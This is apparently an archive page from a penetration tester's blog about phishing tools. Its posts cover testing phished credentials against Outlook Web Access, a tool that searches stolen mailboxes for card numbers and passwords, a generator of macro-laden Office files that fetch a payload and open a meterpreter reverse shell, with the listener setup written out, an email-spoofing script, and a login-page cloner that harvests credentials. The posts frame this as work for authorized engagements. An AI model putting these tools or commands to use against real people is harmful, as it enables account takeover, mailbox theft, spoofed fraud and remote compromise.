Archive for the ‘Phishing’ Category

Quick Script to Test Domain Credentials on OWA (Outlook Web Access) Site

#If you need to quickly test the credentials captured from a OWA site during a phishing test, the below script might come in handy.

#Script can be downloaded from the below URL

$ python -f /tmp/creds.txt -c , -s -n 20

#Format of creds.txt domain\user1 Password1

Categories: Phishing

owaDump – Another tool to use during Phishing Campaigns

October 20, 2016 Leave a comment

There were a number of tools available in the Internet for attacking Exchange/Outlook Web Access.

Below are some of them that I have used before.
1) OWA-Toolkit (
2) Metasploit Outlook Web Access (OWA) Bruteforce Utility (
3) OWABF (,26944)
4) PEAS (
5) MailSniper (

During a phishing test, other than attempting to gain further access to the target’s network via HTA powershell, exploiting out-of-date browser plugins and etc, another interesting thing to look at are targets’ email accounts.

If we have captured more than 50 to 100 credentials via the phishing test, it might not be feasible to ransack the mailboxes one at a time manually.

I needed a simple tool (that I can write in a couple of hours) to search the mailboxes of users for PAN (VISA and MasterCard) numbers, passwords or even specific keywords.

As there were tons of resources on the Internet regarding Exchange Web Services (EWS) for C#, I decided to write the tool in C# instead of the usual Python/Ruby and use mono to run the executable on OSX and Linux. I have tested this on OSX and Win32.

Mono can be downloaded from

It should work on all versions of OWA.
Please let me know if you face any issues.

$ mono owaDump.exe -h
-u, –user       Required. Email Address
-p, –pass       Required. Password
-f, –file       Text File (Email|Password) Per Line
-k, –keyword    Text to Search
–pan            (Default: False) Find PAN numbers
-d               (Default: False) Debug Mode
-h, –help       (Default: False) Print This Help Menu

Below are some ways you can use the tool.
In the below example, keywords such as password, creds, credentials, ssn, credit card are used as search terms.

$ mono owaDump.exe -u -p Password#

[Subject]: RE [WARNING :  Test Mail]

If you check the current folder, you will see the below files.
Emails and attachments that we found to be matching the search terms were downloaded.

$ ls

If you would like to search for PAN numbers, you can use the –pan keyword.

$ mono owaDump.exe -u -p ‘Password’ –pan
[PAN] PAN Number found in keith_Inbox3.eml

If you have a list of email addresses and passwords which you captured from a phishing test or a dump from the Domain Controller, you can use the below.

Below is the format of the text file if you want to target multiple accounts.

$ cat creds.txt|password1|password2

$ mono owaDump.exe -f creds.txt
[Subject]: RE [WARNING :  Test Mail]

[Subject]: RE [WARNING :  Test Mail]

The source code is available for download at

If you needed a compiled version of the executable, it is available at

This is a pre-release.  Please send me your comments and suggestions.

Thank you for reading.


Phishing Toys

February 1, 2016 Leave a comment

I wrote 2 scripts with the help of a co-worker that are useful in our social engineering engagements.

  • – This script generates Microsoft documents (VBA code) that uses Powershell to get a meterpreter reverse shell. This script works on a Linux/Mac machine unlike some scripts I found which requires a Windows machine. This works by patching the hex bytes (ip address and port) in the pre-generated office documents.
  • – This script is useful in sending spoofed emails to some SMTP servers.


Check the below link for the Github repository

The script generates office documents (xls, doc and ppt) that includes VBA code that downloads and run the Invoke-Shellcode.ps1 (creates a meterpreter reverse shell back to server) when the victim enables Macro in the document.

You will need to run the windows/meterpreter/reverse_https payload on your the attacker host.

$ ./msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4443
msf exploit(handler) > set SessionCommunicationTimeout 0
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

Below is the help screen of the script.

$  python -h
usage: [-h] [-t T] [-o O] [-ip IP] [-port PORT]

optional arguments:
  -h, --help  show this help message and exit
  -t T        [xls|doc|ppt|all]
  -o O        [output filename (without extension)]
  -ip IP      [meterpreter listener ip address]
  -port PORT  [meterpreter listener port]

Below is the script in action.

$  python -t all -o salary -ip -port 1111 
- Generated: salary.xls
- Generated: salary.doc
- Generated: salary.ppt
This script is useful in sending spoofed emails to some SMTP servers. This can be useful in social engineering engagements.

Below is the help screen of the script.

$ python -h
usage: [-h] [-f F] [-n N] [-e E] [-t T] [-iL IL] [-v]

optional arguments:
  -h, --help  show this help message and exit
  -f F        [html file containing the email body]
  -n N        [recipient name]
  -e E        [recipient email]
  -t T        [delay between 1 to x seconds (random)]
  -iL IL      [file containing recipient name and email addresses per line
              separated by comma]
  -v          [verbose]

Below is the script in action.

$ python -iL namelist.txt -f sampleHtml.txt -t 10
Sending email to:  

You can use keywords like @trackingCode and @user in HTML emails which will be replaced by the values listed in namelist.txt. (See sampleHTML.txt for an example of the usage of two keywords)

  • @user is the victim’s name (1st field in namelist.txt)
  • @trackingCode is the individual codes assigned to per victim email address in Phishing Frenzy (3rd field in namelist.txt)

Below are two sample formats of namelist.txt
Below is sample 1
The fields are separated by “,”
The first field is: recipient’s name
The second field is: recipient’s email address


Below is sample 2
The first field is: recipient’s name
The second field is: recipient’s email address
The last field is: tracking code


Easily clone sites and import as Phishing Frenzy templates (Phishing for passwords)

January 22, 2016 Leave a comment

Phishing Frenzy is an awesome tool to use during Social Engineering/Spear Phishing exercises.

One of the tasks that I spent a lot of time on when using Phishing Frenzy is the ‘cloning of a website’ to be used for phishing passwords.

Phishing Frenzy does have a ‘Website Cloner’ but its pretty basic and some work needs to be done on the generated HTML file before it can be used as a template. (e.g. modify the input name of the username and password fields, changing the form action URL, create the template.yml and attachments.yml and zip up the files).

I wrote a simple script to take the URL of the website you want to clone (along with other information like Phishing Frenzy server URL and the ‘fake domain name/public IP address of the server hosting the cloned website’) and generates a working template zip that you can import directly into Phishing Frenzy under Templates > Restore menu.

Hope this can be of help to anyone of you in future social engineering engagements.

Below is a screenshot of the script in action.

phishing frenzy template zip generator

When a user visits and keys in the credentials into the cloned website, the credentials will be recorded into the creds.log file and also sent to your phishing frenzy server .

You can find the python scripts at
Thank you for reading.

Updates:  I have update the template to include browser plugin enumeration via Javascript. This should be useful for some. The information is sent back to your Phishing Frenzy server.